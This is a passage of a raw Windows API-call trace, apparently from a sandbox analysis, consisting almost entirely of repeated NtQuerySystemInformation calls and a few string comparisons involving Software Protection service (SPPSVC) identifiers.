NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaa0, Length=0x28, ResultLength=0x0) [0273.117] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x40, ResultLength=0x0) [0273.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.139] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.153] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.161] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.161] NtQuerySystemInformation 